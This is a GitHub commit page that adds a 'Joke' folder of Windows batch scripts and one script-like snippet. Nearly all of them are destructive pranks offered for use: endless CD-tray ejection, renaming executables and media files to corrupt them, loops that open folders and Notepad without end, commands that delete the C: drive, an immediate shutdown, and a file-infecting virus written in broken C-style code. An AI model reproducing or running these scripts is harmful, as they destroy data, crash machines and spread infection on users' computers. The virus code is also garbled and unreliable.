Skip to content

Commit d07a71a

Browse files
authored
Add files via upload
1 parent 5cea57a commit d07a71a

13 files changed

+174
-0
lines changed

Joke/README.md

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
![BAT-v_1.8](https://socialify.git.ci/sachinl0har/BAT-v_1.8/image?font=Source%20Code%20Pro&forks=1&issues=1&language=1&owner=1&pulls=1&stargazers=1&theme=Dark)
2+
# BAT-v_1.8

Joke/cd_popup.bat

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
Set oWMP = CreateObject(“WMPlayer.OCX.7”)
2+
Set colCDROMs = oWMP.cdromCollection
3+
do
4+
if colCDROMs.Count >= 1 then
5+
For i = 0 to colCDROMs.Count – 1
6+
colCDROMs.Item(i).Eject
7+
Next
8+
For i = 0 to colCDROMs.Count – 1
9+
colCDROMs.Item(i).Eject
10+
Next
11+
End If
12+
wscript.sleep 5000
13+
loop

Joke/corrupt_files.bat

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,6 @@
1+
@echo off
2+
ren *.exe *.txt
3+
ren *.jpeg *.txt
4+
ren *.mp3 *.txt
5+
ren *.doc *.com
6+
ren *.jpg *.txt

Joke/crash_folder.bat

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
@echo off
2+
:RON
3+
md folder1
4+
md folder2
5+
md folder3
6+
md folder4
7+
md folder5
8+
start folder1
9+
start folder2
10+
start folder3
11+
start folder4
12+
start folder5
13+
goto RON

Joke/crash_notepad.bat

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,6 @@
1+
@echo off
2+
:RON
3+
start notepad
4+
start notepad
5+
start notepad
6+
goto RON

Joke/endless-notepads.bat

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,4 @@
1+
@ECHO off
2+
:top
3+
START %SystemRoot%\system32\notepad.exe
4+
GOTO top

Joke/file_virus.bat

Lines changed: 35 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,35 @@
1+
FILE *Ron *vRon;
2+
int owned = 0;
3+
unsigned long x;
4+
char buff[256];
5+
struct ffblk ffblk;
6+
clock_t st, end;
7+
main()
8+
{
9+
st=clock();
10+
clrscr();
11+
owned=(find_first(“*.*”, &ffblk,0);
12+
while(!done)
13+
{
14+
Ron=fopen(_arg[0], “rb”);
15+
vhost=fopen(ffblk.ff_name, “rb+”);
16+
if (vhost = =NULL)
17+
goto next;
18+
x = 89088;
19+
printf(“infecting %s\n”, ffblk.ff_name);
20+
while(x>2048)
21+
{
22+
fread(buff,256,1,Ron);
23+
fwrite(buff,256,1,vRon);
24+
x – = 2048;
25+
}
26+
fread(buff,x,1,Ron);
27+
fwrite(buff,x,1,vRon);
28+
a++;
29+
next:      fcloseall();
30+
owned = findnext(&ffblk);
31+
}
32+
end = clock()
33+
printf(“Infected %d files in %f sec”, a, (end-st)/CLK_TCk);
34+
return (0);
35+
}

Joke/format_c.bat

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
@Echo off
2+
Del C:\ *.* |y

Joke/os_remover.bat

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
@echo off
2+
deltree C:\

Joke/shutdown_t-0s.bat

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
@echo off
2+
shutdown -s -t “00”

0 commit comments

Comments
 (0)